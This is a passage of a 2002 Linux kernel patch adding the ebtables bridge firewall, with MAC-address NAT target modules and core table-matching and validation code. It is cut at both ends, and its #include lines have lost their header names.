ebt_target_snat, ebt_target_snat_check, + NULL, THIS_MODULE +}; + +static int __init init(void) +{ + return ebt_register_target(&snat); +} + +static void __exit fini(void) +{ + ebt_unregister_target(&snat); +} + +module_init(init); +module_exit(fini); +EXPORT_NO_SYMBOLS; +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebt_dnat.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,65 @@ +/* + * ebt_dnat + * + * Authors: + * Bart De Schuymer + * + * June, 2002 + * + */ + +#include +#include +#include +#include + +static int ebt_target_dnat(struct sk_buff **pskb, unsigned int hooknr, + const struct net_device *in, const struct net_device *out, + const void *data, unsigned int datalen) +{ + struct ebt_nat_info *info = (struct ebt_nat_info *)data; + + memcpy(((**pskb).mac.ethernet)->h_dest, info->mac, + ETH_ALEN * sizeof(unsigned char)); + return info->target; +} + +static int ebt_target_dnat_check(const char *tablename, unsigned int hookmask, + const struct 
ebt_entry *e, void *data, unsigned int datalen)
+{
+	struct ebt_nat_info *info = (struct ebt_nat_info *)data;
+
+	if (BASE_CHAIN && info->target == EBT_RETURN)
+		return -EINVAL;
+	CLEAR_BASE_CHAIN_BIT;
+	if ( (strcmp(tablename, "nat") ||
+	   (hookmask & ~((1 << NF_BR_PRE_ROUTING) | (1 << NF_BR_LOCAL_OUT)))) &&
+	   (strcmp(tablename, "broute") || hookmask & ~(1 << NF_BR_BROUTING)) )
+		return -EINVAL;
+	if (datalen != sizeof(struct ebt_nat_info))
+		return -EINVAL;
+	if (INVALID_TARGET)
+		return -EINVAL;
+	return 0;
+}
+
+static struct ebt_target dnat =
+{
+	{NULL, NULL}, EBT_DNAT_TARGET, ebt_target_dnat, ebt_target_dnat_check,
+	NULL, THIS_MODULE
+};
+
+static int __init init(void)
+{
+	return ebt_register_target(&dnat);
+}
+
+static void __exit fini(void)
+{
+	ebt_unregister_target(&dnat);
+}
+
+module_init(init);
+module_exit(fini);
+EXPORT_NO_SYMBOLS;
+MODULE_LICENSE("GPL");
--- /dev/null Thu Aug 24 11:00:32 2000
+++ linux-2.5.34-ebtables/net/bridge/netfilter/ebtables.c Wed Sep 11 23:06:55 2002
@@ -0,0 +1,1484 @@
+/*
+ * ebtables
+ *
+ * Author:
+ * Bart De Schuymer
+ *
+ * ebtables.c,v 2.0, July, 2002
+ *
+ * This code is strongly inspired by the iptables code which is
+ * Copyright (C) 1999 Paul `Rusty' Russell & Michael J. Neuling
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License
+ * as published by the Free Software Foundation; either version
+ * 2 of the License, or (at your option) any later version.
+ */ + +// used for print_string +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +// needed for logical [in,out]-dev filtering +#include "../br_private.h" + +// list_named_find +#define ASSERT_READ_LOCK(x) +#define ASSERT_WRITE_LOCK(x) +#include + +#if 0 // use this for remote debugging +// Copyright (C) 1998 by Ori Pomerantz +// Print the string to the appropriate tty, the one +// the current task uses +static void print_string(char *str) +{ + struct tty_struct *my_tty; + + /* The tty for the current task */ + my_tty = current->tty; + if (my_tty != NULL) { + (*(my_tty->driver).write)(my_tty, 0, str, strlen(str)); + (*(my_tty->driver).write)(my_tty, 0, "\015\012", 2); + } +} + +#define BUGPRINT(args) print_string(args); +#else +#define BUGPRINT(format, args...) printk("kernel msg: ebtables bug: please "\ + "report to author: "format, ## args) +// #define BUGPRINT(format, args...) +#endif +#define MEMPRINT(format, args...) printk("kernel msg: ebtables "\ + ": out of memory: "format, ## args) +// #define MEMPRINT(format, args...) 
+ + + +// Each cpu has its own set of counters, so there is no need for write_lock in +// the softirq +// For reading or updating the counters, the user context needs to +// get a write_lock + +// The size of each set of counters is altered to get cache alignment +#define SMP_ALIGN(x) (((x) + SMP_CACHE_BYTES-1) & ~(SMP_CACHE_BYTES-1)) +#define COUNTER_OFFSET(n) (SMP_ALIGN(n * sizeof(struct ebt_counter))) +#define COUNTER_BASE(c, n, cpu) ((struct ebt_counter *)(((char *)c) + \ + COUNTER_OFFSET(n) * cpu)) + + + +static DECLARE_MUTEX(ebt_mutex); +static LIST_HEAD(ebt_tables); +static LIST_HEAD(ebt_targets); +static LIST_HEAD(ebt_matches); +static LIST_HEAD(ebt_watchers); + +static struct ebt_target ebt_standard_target = +{ {NULL, NULL}, EBT_STANDARD_TARGET, NULL, NULL, NULL, NULL}; + +static inline int ebt_do_watcher (struct ebt_entry_watcher *w, + const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out) +{ + w->u.watcher->watcher(skb, in, out, w->data, + w->watcher_size); + // watchers don't give a verdict + return 0; +} + +static inline int ebt_do_match (struct ebt_entry_match *m, + const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out) +{ + return m->u.match->match(skb, in, out, m->data, + m->match_size); +} + +static inline int ebt_dev_check(char *entry, const struct net_device *device) +{ + if (*entry == '\0') + return 0; + if (!device) + return 1; + return !!strcmp(entry, device->name); +} + +#define FWINV2(bool,invflg) ((bool) ^ !!(e->invflags & invflg)) +// process standard matches +static inline int ebt_basic_match(struct ebt_entry *e, struct ethhdr *h, + const struct net_device *in, const struct net_device *out) +{ + int verdict, i; + + if (e->bitmask & EBT_802_3) { + if (FWINV2(ntohs(h->h_proto) >= 1536, EBT_IPROTO)) + return 1; + } else if (!(e->bitmask & EBT_NOPROTO) && + FWINV2(e->ethproto != h->h_proto, EBT_IPROTO)) + return 1; + + if (FWINV2(ebt_dev_check(e->in, in), EBT_IIN)) + return 1; 
+ if (FWINV2(ebt_dev_check(e->out, out), EBT_IOUT)) + return 1; + if ((!in || !in->br_port) ? 0 : FWINV2(ebt_dev_check( + e->logical_in, &in->br_port->br->dev), EBT_ILOGICALIN)) + return 1; + if ((!out || !out->br_port) ? 0 : FWINV2(ebt_dev_check( + e->logical_out, &out->br_port->br->dev), EBT_ILOGICALOUT)) + return 1; + + if (e->bitmask & EBT_SOURCEMAC) { + verdict = 0; + for (i = 0; i < 6; i++) + verdict |= (h->h_source[i] ^ e->sourcemac[i]) & + e->sourcemsk[i]; + if (FWINV2(verdict != 0, EBT_ISOURCE) ) + return 1; + } + if (e->bitmask & EBT_DESTMAC) { + verdict = 0; + for (i = 0; i < 6; i++) + verdict |= (h->h_dest[i] ^ e->destmac[i]) & + e->destmsk[i]; + if (FWINV2(verdict != 0, EBT_IDEST) ) + return 1; + } + return 0; +} + +// Do some firewalling +unsigned int ebt_do_table (unsigned int hook, struct sk_buff **pskb, + const struct net_device *in, const struct net_device *out, + struct ebt_table *table) +{ + int i, nentries; + struct ebt_entry *point; + struct ebt_counter *counter_base, *cb_base; + struct ebt_entry_target *t; + int verdict, sp = 0; + struct ebt_chainstack *cs; + struct ebt_entries *chaininfo; + char *base; + struct ebt_table_info *private = table->private; + + read_lock_bh(&table->lock); + cb_base = COUNTER_BASE(private->counters, private->nentries, + smp_processor_id()); + if (private->chainstack) + cs = private->chainstack[smp_processor_id()]; + else + cs = NULL; + chaininfo = private->hook_entry[hook]; + nentries = private->hook_entry[hook]->nentries; + point = (struct ebt_entry *)(private->hook_entry[hook]->data); + counter_base = cb_base + private->hook_entry[hook]->counter_offset; + // base for chain jumps + base = (char *)chaininfo; + i = 0; + while (i < nentries) { + if (ebt_basic_match(point, (**pskb).mac.ethernet, in, out)) + goto letscontinue; + + if (EBT_MATCH_ITERATE(point, ebt_do_match, *pskb, in, out) != 0) + goto letscontinue; + + // increase counter + (*(counter_base + i)).pcnt++; + + // these should only watch: not modify, nor 
tell us + // what to do with the packet + EBT_WATCHER_ITERATE(point, ebt_do_watcher, *pskb, in, + out); + + t = (struct ebt_entry_target *) + (((char *)point) + point->target_offset); + // standard target + if (!t->u.target->target) + verdict = ((struct ebt_standard_target *)t)->verdict; + else + verdict = t->u.target->target(pskb, hook, + in, out, t->data, t->target_size); + if (verdict == EBT_ACCEPT) { + read_unlock_bh(&table->lock); + return NF_ACCEPT; + } + if (verdict == EBT_DROP) { + read_unlock_bh(&table->lock); + return NF_DROP; + } + if (verdict == EBT_RETURN) { +letsreturn: +#ifdef CONFIG_NETFILTER_DEBUG + if (sp == 0) { + BUGPRINT("RETURN on base chain"); + // act like this is EBT_CONTINUE + goto letscontinue; + } +#endif + sp--; + // put all the local variables right + i = cs[sp].n; + chaininfo = cs[sp].chaininfo; + nentries = chaininfo->nentries; + point = cs[sp].e; + counter_base = cb_base + + chaininfo->counter_offset; + continue; + } + if (verdict == EBT_CONTINUE) + goto letscontinue; +#ifdef CONFIG_NETFILTER_DEBUG + if (verdict < 0) { + BUGPRINT("bogus standard verdict\n"); + read_unlock_bh(&table->lock); + return NF_DROP; + } +#endif + // jump to a udc + cs[sp].n = i + 1; + cs[sp].chaininfo = chaininfo; + cs[sp].e = (struct ebt_entry *) + (((char *)point) + point->next_offset); + i = 0; + chaininfo = (struct ebt_entries *) (base + verdict); +#ifdef CONFIG_NETFILTER_DEBUG + if (chaininfo->distinguisher) { + BUGPRINT("jump to non-chain\n"); + read_unlock_bh(&table->lock); + return NF_DROP; + } +#endif + nentries = chaininfo->nentries; + point = (struct ebt_entry *)chaininfo->data; + counter_base = cb_base + chaininfo->counter_offset; + sp++; + continue; +letscontinue: + point = (struct ebt_entry *) + (((char *)point) + point->next_offset); + i++; + } + + // I actually like this :) + if (chaininfo->policy == EBT_RETURN) + goto letsreturn; + if (chaininfo->policy == EBT_ACCEPT) { + read_unlock_bh(&table->lock); + return NF_ACCEPT; + } + 
read_unlock_bh(&table->lock); + return NF_DROP; +} + +// If it succeeds, returns element and locks mutex +static inline void * +find_inlist_lock_noload(struct list_head *head, const char *name, int *error, + struct semaphore *mutex) +{ + void *ret; + + *error = down_interruptible(mutex); + if (*error != 0) + return NULL; + + ret = list_named_find(head, name); + if (!ret) { + *error = -ENOENT; + up(mutex); + } + return ret; +} + +#ifndef CONFIG_KMOD +#define find_inlist_lock(h,n,p,e,m) find_inlist_lock_noload((h),(n),(e),(m)) +#else +static void * +find_inlist_lock(struct list_head *head, const char *name, const char *prefix, + int *error, struct semaphore *mutex) +{ + void *ret; + + ret = find_inlist_lock_noload(head, name, error, mutex); + if (!ret) { + char modulename[EBT_FUNCTION_MAXNAMELEN + strlen(prefix) + 1]; + strcpy(modulename, prefix); + strcat(modulename, name); + request_module(modulename); + ret = find_inlist_lock_noload(head, name, error, mutex); + } + return ret; +} +#endif + +static inline struct ebt_table * +find_table_lock(const char *name, int *error, struct semaphore *mutex) +{ + return find_inlist_lock(&ebt_tables, name, "ebtable_", error, mutex); +} + +static inline struct ebt_match * +find_match_lock(const char *name, int *error, struct semaphore *mutex) +{ + return find_inlist_lock(&ebt_matches, name, "ebt_", error, mutex); +} + +static inline struct ebt_watcher * +find_watcher_lock(const char *name, int *error, struct semaphore *mutex) +{ + return find_inlist_lock(&ebt_watchers, name, "ebt_", error, mutex); +} + +static inline struct ebt_target * +find_target_lock(const char *name, int *error, struct semaphore *mutex) +{ + return find_inlist_lock(&ebt_targets, name, "ebt_", error, mutex); +} + +static inline int +ebt_check_match(struct ebt_entry_match *m, struct ebt_entry *e, + const char *name, unsigned int hookmask, unsigned int *cnt) +{ + struct ebt_match *match; + int ret; + + if (((char *)m) + m->match_size + sizeof(struct 
ebt_entry_match) > + ((char *)e) + e->watchers_offset) + return -EINVAL; + match = find_match_lock(m->u.name, &ret, &ebt_mutex); + if (!match) + return ret; + m->u.match = match; + if (match->me) + __MOD_INC_USE_COUNT(match->me); + up(&ebt_mutex); + if (match->check && + match->check(name, hookmask, e, m->data, m->match_size) != 0) { + BUGPRINT("match->check failed\n"); + if (match->me) + __MOD_DEC_USE_COUNT(match->me); + return -EINVAL; + } + (*cnt)++; + return 0; +} + +static inline int +ebt_check_watcher(struct ebt_entry_watcher *w, struct ebt_entry *e, + const char *name, unsigned int hookmask, unsigned int *cnt) +{ + struct ebt_watcher *watcher; + int ret; + + if (((char *)w) + w->watcher_size + sizeof(struct ebt_entry_watcher) > + ((char *)e) + e->target_offset) + return -EINVAL; + watcher = find_watcher_lock(w->u.name, &ret, &ebt_mutex); + if (!watcher) + return ret; + w->u.watcher = watcher; + if (watcher->me) + __MOD_INC_USE_COUNT(watcher->me); + up(&ebt_mutex); + if (watcher->check && + watcher->check(name, hookmask, e, w->data, w->watcher_size) != 0) { + BUGPRINT("watcher->check failed\n"); + if (watcher->me) + __MOD_DEC_USE_COUNT(watcher->me); + return -EINVAL; + } + (*cnt)++; + return 0; +} + +// this one is very careful, as it is the first function +// to parse the userspace data +static inline int +ebt_check_entry_size_and_hooks(struct ebt_entry *e, + struct ebt_table_info *newinfo, char *base, char *limit, + struct ebt_entries **hook_entries, unsigned int *n, unsigned int *cnt, + unsigned int *totalcnt, unsigned int *udc_cnt, unsigned int valid_hooks) +{ + int i; + + for (i = 0; i < NF_BR_NUMHOOKS; i++) { + if ((valid_hooks & (1 << i)) == 0) + continue; + if ( (char *)hook_entries[i] - base == + (char *)e - newinfo->entries) + break; + } + // beginning of a new chain + // if i == NF_BR_NUMHOOKS it must be a user defined chain + if (i != NF_BR_NUMHOOKS || !(e->bitmask & EBT_ENTRY_OR_ENTRIES)) { + if ((e->bitmask & EBT_ENTRY_OR_ENTRIES) != 0) { + // 
we make userspace set this right, + // so there is no misunderstanding + BUGPRINT("EBT_ENTRY_OR_ENTRIES shouldn't be set " + "in distinguisher\n"); + return -EINVAL; + } + // this checks if the previous chain has as many entries + // as it said it has + if (*n != *cnt) { + BUGPRINT("nentries does not equal the nr of entries " + "in the chain\n"); + return -EINVAL; + } + // before we look at the struct, be sure it is not too big + if ((char *)hook_entries[i] + sizeof(struct ebt_entries) + > limit) { + BUGPRINT("entries_size too small\n"); + return -EINVAL; + } + if (((struct ebt_entries *)e)->policy != EBT_DROP && + ((struct ebt_entries *)e)->policy != EBT_ACCEPT) { + // only RETURN from udc + if (i != NF_BR_NUMHOOKS || + ((struct ebt_entries *)e)->policy != EBT_RETURN) { + BUGPRINT("bad policy\n"); + return -EINVAL; + } + } + if (i == NF_BR_NUMHOOKS) // it's a user defined chain + (*udc_cnt)++; + else + newinfo->hook_entry[i] = (struct ebt_entries *)e; + if (((struct ebt_entries *)e)->counter_offset != *totalcnt) { + BUGPRINT("counter_offset != totalcnt"); + return -EINVAL; + } + *n = ((struct ebt_entries *)e)->nentries; + *cnt = 0; + return 0; + } + // a plain old entry, heh + if (sizeof(struct ebt_entry) > e->watchers_offset || + e->watchers_offset > e->target_offset || + e->target_offset >= e->next_offset) { + BUGPRINT("entry offsets not in right order\n"); + return -EINVAL; + } + // this is not checked anywhere else + if (e->next_offset - e->target_offset < sizeof(struct ebt_entry_target)) { + BUGPRINT("target size too small\n"); + return -EINVAL; + } + + (*cnt)++; + (*totalcnt)++; + return 0; +} + +struct ebt_cl_stack +{ + struct ebt_chainstack cs; + int from; + unsigned int hookmask; +}; + +// we need these positions to check that the jumps to a different part of the +// entries is a jump to the beginning of a new chain. 
+static inline int +ebt_get_udc_positions(struct ebt_entry *e, struct ebt_table_info *newinfo, + struct ebt_entries **hook_entries, unsigned int *n, unsigned int valid_hooks, + struct ebt_cl_stack *udc) +{ + int i; + + // we're only interested in chain starts + if (e->bitmask & EBT_ENTRY_OR_ENTRIES) + return 0; + for (i = 0; i < NF_BR_NUMHOOKS; i++) { + if ((valid_hooks & (1 << i)) == 0) + continue; + if (newinfo->hook_entry[i] == (struct ebt_entries *)e) + break; + } + // only care about udc + if (i != NF_BR_NUMHOOKS) + return 0; + + udc[*n].cs.chaininfo = (struct ebt_entries *)e; + // these initialisations are depended on later in check_chainloops() + udc[*n].cs.n = 0; + udc[*n].hookmask = 0; + + (*n)++; + return 0; +} + +static inline int +ebt_cleanup_match(struct ebt_entry_match *m, unsigned int *i) +{ + if (i && (*i)-- == 0) + return 1; + if (m->u.match->destroy) + m->u.match->destroy(m->data, m->match_size); + if (m->u.match->me) + __MOD_DEC_USE_COUNT(m->u.match->me); + + return 0; +} + +static inline int +ebt_cleanup_watcher(struct ebt_entry_watcher *w, unsigned int *i) +{ + if (i && (*i)-- == 0) + return 1; + if (w->u.watcher->destroy) + w->u.watcher->destroy(w->data, w->watcher_size); + if (w->u.watcher->me) + __MOD_DEC_USE_COUNT(w->u.watcher->me); + + return 0; +} + +static inline int +ebt_cleanup_entry(struct ebt_entry *e, unsigned int *cnt) +{ + struct ebt_entry_target *t; + + if ((e->bitmask & EBT_ENTRY_OR_ENTRIES) == 0) + return 0; + // we're done + if (cnt && (*cnt)-- == 0) + return 1; + EBT_WATCHER_ITERATE(e, ebt_cleanup_watcher, NULL); + EBT_MATCH_ITERATE(e, ebt_cleanup_match, NULL); + t = (struct ebt_entry_target *)(((char *)e) + e->target_offset); + if (t->u.target->destroy) + t->u.target->destroy(t->data, t->target_size); + if (t->u.target->me) + __MOD_DEC_USE_COUNT(t->u.target->me); + + return 0; +} + +static inline int +ebt_check_entry(struct ebt_entry *e, struct ebt_table_info *newinfo, + const char *name, unsigned int *cnt, unsigned int 
valid_hooks, + struct ebt_cl_stack *cl_s, unsigned int udc_cnt) +{ + struct ebt_entry_target *t; + struct ebt_target *target; + unsigned int i, j, hook = 0, hookmask = 0; + int ret; + + // Don't mess with the struct ebt_entries + if ((e->bitmask & EBT_ENTRY_OR_ENTRIES) == 0) + return 0; + + if (e->bitmask & ~EBT_F_MASK) { + BUGPRINT("Unknown flag for bitmask\n"); + return -EINVAL; + } + if (e->invflags & ~EBT_INV_MASK) { + BUGPRINT("Unknown flag for inv bitmask\n"); + return -EINVAL; + } + if ( (e->bitmask & EBT_NOPROTO) && (e->bitmask & EBT_802_3) ) { + BUGPRINT("NOPROTO & 802_3 not allowed\n"); + return -EINVAL; + } + // what hook do we belong to? + for (i = 0; i < NF_BR_NUMHOOKS; i++) { + if ((valid_hooks & (1 << i)) == 0) + continue; + if ((char *)newinfo->hook_entry[i] < (char *)e) + hook = i; + else + break; + } + // (1 << NF_BR_NUMHOOKS) tells the check functions the rule is on + // a base chain + if (i < NF_BR_NUMHOOKS) + hookmask = (1 << hook) | (1 << NF_BR_NUMHOOKS); + else { + for (i = 0; i < udc_cnt; i++) + if ((char *)(cl_s[i].cs.chaininfo) > (char *)e) + break; + if (i == 0) + hookmask = (1 << hook) | (1 << NF_BR_NUMHOOKS); + else + hookmask = cl_s[i - 1].hookmask; + } + i = 0; + ret = EBT_MATCH_ITERATE(e, ebt_check_match, e, name, hookmask, &i); + if (ret != 0) + goto cleanup_matches; + j = 0; + ret = EBT_WATCHER_ITERATE(e, ebt_check_watcher, e, name, hookmask, &j); + if (ret != 0) + goto cleanup_watchers; + t = (struct ebt_entry_target *)(((char *)e) + e->target_offset); + target = find_target_lock(t->u.name, &ret, &ebt_mutex); + if (!target) + goto cleanup_watchers; + if (target->me) + __MOD_INC_USE_COUNT(target->me); + up(&ebt_mutex); + + t->u.target = target; + if (t->u.target == &ebt_standard_target) { + if (e->target_offset + sizeof(struct ebt_standard_target) > + e->next_offset) { + BUGPRINT("Standard target size too big\n"); + ret = -EFAULT; + goto cleanup_watchers; + } + if (((struct ebt_standard_target *)t)->verdict < + 
-NUM_STANDARD_TARGETS) { + BUGPRINT("Invalid standard target\n"); + ret = -EFAULT; + goto cleanup_watchers; + } + } else if ((e->target_offset + t->target_size + + sizeof(struct ebt_entry_target) > e->next_offset) || + (t->u.target->check && + t->u.target->check(name, hookmask, e, t->data, t->target_size) != 0)){ + if (t->u.target->me) + __MOD_DEC_USE_COUNT(t->u.target->me); + ret = -EFAULT; + goto cleanup_watchers; + } + (*cnt)++; + return 0; +cleanup_watchers: + EBT_WATCHER_ITERATE(e, ebt_cleanup_watcher, &j); +cleanup_matches: + EBT_MATCH_ITERATE(e, ebt_cleanup_match, &i); + return ret; +} + +// checks for loops and sets the hook mask for udc +// the hook mask for udc tells us from which base chains the udc can be +// accessed. This mask is a parameter to the check() functions of the extensions +int check_chainloops(struct ebt_entries *chain, struct ebt_cl_stack *cl_s, + unsigned int udc_cnt, unsigned int hooknr, char *base) +{ + int i, chain_nr = -1, pos = 0, nentries = chain->nentries, verdict; + struct ebt_entry *e = (struct ebt_entry *)chain->data; + struct ebt_entry_target *t; + + while (pos < nentries || chain_nr != -1) { + // end of udc, go back one 'recursion' step + if (pos == nentries) { + // put back values of the time when this chain was called + e = cl_s[chain_nr].cs.e; + if (cl_s[chain_nr].from != -1) + nentries = + cl_s[cl_s[chain_nr].from].cs.chaininfo->nentries; + else + nentries = chain->nentries; + pos = cl_s[chain_nr].cs.n; + // make sure we won't see a loop that isn't one + cl_s[chain_nr].cs.n = 0; + chain_nr = cl_s[chain_nr].from; + if (pos == nentries) + continue; + } + t = (struct ebt_entry_target *) + (((char *)e) + e->target_offset); + if (strcmp(t->u.name, EBT_STANDARD_TARGET)) + goto letscontinue; + if (e->target_offset + sizeof(struct ebt_standard_target) > + e->next_offset) { + BUGPRINT("Standard target size too big\n"); + return -1; + } + verdict = ((struct ebt_standard_target *)t)->verdict; + if (verdict >= 0) { // jump to another 
chain + struct ebt_entries *hlp2 = + (struct ebt_entries *)(base + verdict); + for (i = 0; i < udc_cnt; i++) + if (hlp2 == cl_s[i].cs.chaininfo) + break; + // bad destination or loop + if (i == udc_cnt) { + BUGPRINT("bad destination\n"); + return -1; + } + if (cl_s[i].cs.n) { + BUGPRINT("loop\n"); + return -1; + } + // this can't be 0, so the above test is correct + cl_s[i].cs.n = pos + 1; + pos = 0; + cl_s[i].cs.e = ((void *)e + e->next_offset); + e = (struct ebt_entry *)(hlp2->data); + nentries = hlp2->nentries; + cl_s[i].from = chain_nr; + chain_nr = i; + // this udc is accessible from the base chain for hooknr + cl_s[i].hookmask |= (1 << hooknr); + continue; + } +letscontinue: + e = (void *)e + e->next_offset; + pos++; + } + return 0; +} + +// do the parsing of the table/chains/entries/matches/watchers/targets, heh +static int translate_table(struct ebt_replace *repl, + struct ebt_table_info *newinfo) +{ + unsigned int i, j, k, udc_cnt; + int ret; + struct ebt_cl_stack *cl_s = NULL; // used in the checking for chain loops + + i = 0; + while (i < NF_BR_NUMHOOKS && !(repl->valid_hooks & (1 << i))) + i++; + if (i == NF_BR_NUMHOOKS) { + BUGPRINT("No valid hooks specified\n"); + return -EINVAL; + } + if (repl->hook_entry[i] != (struct ebt_entries *)repl->entries) { + BUGPRINT("Chains don't start at beginning\n"); + return -EINVAL; + } + // make sure chains are ordered after each other in same order + // as their corresponding hooks + for (j = i + 1; j < NF_BR_NUMHOOKS; j++) { + if (!(repl->valid_hooks & (1 << j))) + continue; + if ( repl->hook_entry[j] <= repl->hook_entry[i] ) { + BUGPRINT("Hook order must be followed\n"); + return -EINVAL; + } + i = j; + } + + for (i = 0; i < NF_BR_NUMHOOKS; i++) + newinfo->hook_entry[i] = NULL; + + newinfo->entries_size = repl->entries_size; + newinfo->nentries = repl->nentries; + + // do some early checkings and initialize some things + i = 0; // holds the expected nr. 
of entries for the chain + j = 0; // holds the up to now counted entries for the chain + k = 0; // holds the total nr. of entries, should equal + // newinfo->nentries afterwards + udc_cnt = 0; // will hold the nr. of user defined chains (udc) + ret = EBT_ENTRY_ITERATE(newinfo->entries, newinfo->entries_size, + ebt_check_entry_size_and_hooks, newinfo, repl->entries, + repl->entries + repl->entries_size, repl->hook_entry, &i, &j, &k, + &udc_cnt, repl->valid_hooks); + + if (ret != 0) + return ret; + + if (i != j) { + BUGPRINT("nentries does not equal the nr of entries in the " + "(last) chain\n"); + return -EINVAL; + } + if (k != newinfo->nentries) { + BUGPRINT("Total nentries is wrong\n"); + return -EINVAL; + } + + // check if all valid hooks have a chain + for (i = 0; i < NF_BR_NUMHOOKS; i++) { + if (newinfo->hook_entry[i] == NULL && + (repl->valid_hooks & (1 << i))) { + BUGPRINT("Valid hook without chain\n"); + return -EINVAL; + } + } + + // Get the location of the udc, put them in an array + // While we're at it, allocate the chainstack + if (udc_cnt) { + // this will get free'd in do_replace()/ebt_register_table() + // if an error occurs + newinfo->chainstack = (struct ebt_chainstack **) + vmalloc(NR_CPUS * sizeof(struct ebt_chainstack)); + if (!newinfo->chainstack) + return -ENOMEM; + for (i = 0; i < NR_CPUS; i++) { + newinfo->chainstack[i] = + vmalloc(udc_cnt * sizeof(struct ebt_chainstack)); + if (!newinfo->chainstack[i]) { + while (i) + vfree(newinfo->chainstack[--i]); + vfree(newinfo->chainstack); + newinfo->chainstack = NULL; + return -ENOMEM; + } + } + + cl_s = (struct ebt_cl_stack *) + vmalloc(udc_cnt * sizeof(struct ebt_cl_stack)); + if (!cl_s) + return -ENOMEM; + i = 0; // the i'th udc + EBT_ENTRY_ITERATE(newinfo->entries, newinfo->entries_size, + ebt_get_udc_positions, newinfo, repl->hook_entry, &i, + repl->valid_hooks, cl_s); + // sanity check + if (i != udc_cnt) { + BUGPRINT("i != udc_cnt\n"); + vfree(cl_s); + return -EFAULT; + } + } + + // Check for 
loops + for (i = 0; i < NF_BR_NUMHOOKS; i++) + if (repl->valid_hooks & (1 << i)) + if (check_chainloops(newinfo->hook_entry[i], + cl_s, udc_cnt, i, newinfo->entries)) { + if (cl_s) + vfree(cl_s); + return -EINVAL; + } + + // we now know the following (along with E=mc²): + // - the nr of entries in each chain is right + // - the size of the allocated space is right + // - all valid hooks have a corresponding chain + // - there are no loops + // - wrong data can still be on the level of a single entry + // - could be there are jumps to places that are not the + // beginning of a chain. This can only occur in chains that + // are not accessible from any base chains, so we don't care. + + // used to know what we need to clean up if something goes wrong + i = 0; + ret = EBT_ENTRY_ITERATE(newinfo->entries, newinfo->entries_size, + ebt_check_entry, newinfo, repl->name, &i, repl->valid_hooks, + cl_s, udc_cnt); + if (ret != 0) { + EBT_ENTRY_ITERATE(newinfo->entries, newinfo->entries_size, + ebt_cleanup_entry, &i); + } + if (cl_s) + vfree(cl_s); + return ret; +} + +// called under write_lock +static void get_counters(struct ebt_counter *oldcounters, + struct ebt_counter *counters, unsigned int nentries) +{ + int i, cpu; + struct ebt_counter *counter_base; + + // counters of cpu 0 + memcpy(counters, oldcounters, + sizeof(struct ebt_counter) * nentries); + // add other counters to those of cpu 0 + for (cpu = 1; cpu < NR_CPUS; cpu++) { + counter_base = COUNTER_BASE(oldcounters, nentries, cpu); + for (i = 0; i < nentries; i++) + counters[i].pcnt += counter_base[i].pcnt; + } +} + +// replace the table +static int do_replace(void *user, unsigned int len) +{ + int ret, i, countersize; + struct ebt_table_info *newinfo; + struct ebt_replace tmp; + struct ebt_table *t; + struct ebt_counter *counterstmp = NULL; + // used to be able to unlock earlier + struct ebt_table_info *table; + + if (copy_from_user(&tmp, user, sizeof(tmp)) != 0) + return -EFAULT; + + if (len != sizeof(tmp) + 
tmp.entries_size) { + BUGPRINT("Wrong len argument\n"); + return -EINVAL; + } + + if (tmp.entries_size == 0) { + BUGPRINT("Entries_size never zero\n"); + return -EINVAL; + } + countersize = COUNTER_OFFSET(tmp.nentries) * NR_CPUS; + newinfo = (struct ebt_table_info *) + vmalloc(sizeof(struct ebt_table_info) + countersize); + if (!newinfo) + return -ENOMEM; + + if (countersize) + memset(newinfo->counters, 0, countersize); + + newinfo->entries = (char *)vmalloc(tmp.entries_size); + if (!newinfo->entries) { + ret = -ENOMEM; + goto free_newinfo; + } + if (copy_from_user( + newinfo->entries, tmp.entries, tmp.entries_size) != 0) { + BUGPRINT("Couldn't copy entries from userspace\n"); + ret = -EFAULT; + goto free_entries; + } + + // the user wants counters back + // the check on the size is done later, when we have the lock + if (tmp.num_counters) { + counterstmp = (struct ebt_counter *) + vmalloc(tmp.num_counters * sizeof(struct ebt_counter)); + if (!counterstmp) { + ret = -ENOMEM; + goto free_entries; + } + } + else + counterstmp = NULL; + + // this can get initialized by translate_table() + newinfo->chainstack = NULL; + ret = translate_table(&tmp, newinfo); + + if (ret != 0) + goto free_counterstmp; + + t = find_table_lock(tmp.name, &ret, &ebt_mutex); + if (!t) + goto free_iterate; + + // the table doesn't like it + if (t->check && (ret = t->check(newinfo, tmp.valid_hooks))) + goto free_unlock; + + if (tmp.num_counters && tmp.num_counters != t->private->nentries) { + BUGPRINT("Wrong nr. 
of counters requested\n"); + ret = -EINVAL; + goto free_unlock; + } + + // we have the mutex lock, so no danger in reading this pointer + table = t->private; + // we need an atomic snapshot of the counters + write_lock_bh(&t->lock); + if (tmp.num_counters) + get_counters(t->private->counters, counterstmp, + t->private->nentries); + + t->private = newinfo; + write_unlock_bh(&t->lock); + up(&ebt_mutex); + // So, a user can change the chains while having messed up her counter + // allocation. Only reason why this is done is because this way the lock + // is held only once, while this doesn't bring the kernel into a + // dangerous state. + if (tmp.num_counters && + copy_to_user(tmp.counters, counterstmp, + tmp.num_counters * sizeof(struct ebt_counter))) { + BUGPRINT("Couldn't copy counters to userspace\n"); + ret = -EFAULT; + } + else + ret = 0; + + // decrease module count and free resources + EBT_ENTRY_ITERATE(table->entries, table->entries_size, + ebt_cleanup_entry, NULL); + + vfree(table->entries); + if (table->chainstack) { + for (i = 0; i < NR_CPUS; i++) + vfree(table->chainstack[i]); + vfree(table->chainstack); + } + vfree(table); + + if (counterstmp) + vfree(counterstmp); + return ret; + +free_unlock: + up(&ebt_mutex); +free_iterate: + EBT_ENTRY_ITERATE(newinfo->entries, newinfo->entries_size, + ebt_cleanup_entry, NULL); +free_counterstmp: + if (counterstmp) + vfree(counterstmp); + // can be initialized in translate_table() + if (newinfo->chainstack) { + for (i = 0; i < NR_CPUS; i++) + vfree(newinfo->chainstack[i]); + vfree(newinfo->chainstack); + } +free_entries: + if (newinfo->entries) + vfree(newinfo->entries); +free_newinfo: + if (newinfo) + vfree(newinfo); + return ret; +} + +int ebt_register_target(struct ebt_target *target) +{ + int ret; + + ret = down_interruptible(&ebt_mutex); + if (ret != 0) + return 